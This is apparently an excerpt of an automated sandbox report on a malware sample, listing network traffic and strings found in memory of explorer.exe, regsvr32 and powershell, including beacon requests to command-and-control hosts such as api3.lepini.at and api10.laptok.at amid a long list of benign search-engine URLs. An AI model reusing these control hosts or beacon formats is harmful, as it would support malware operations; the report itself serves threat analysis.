Source: global traffic	HTTP traffic detected: GET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at

Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 3653 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp	String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz \| Sign in Hotmail, Outlook Login, Windows Live, Office 365g equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: www.msn.com

Source: unknown

Source: global traffic

Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm
Source: explorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmp	String found in binary or memory: http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000019.00000003.444661390.000001BFEACB7000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
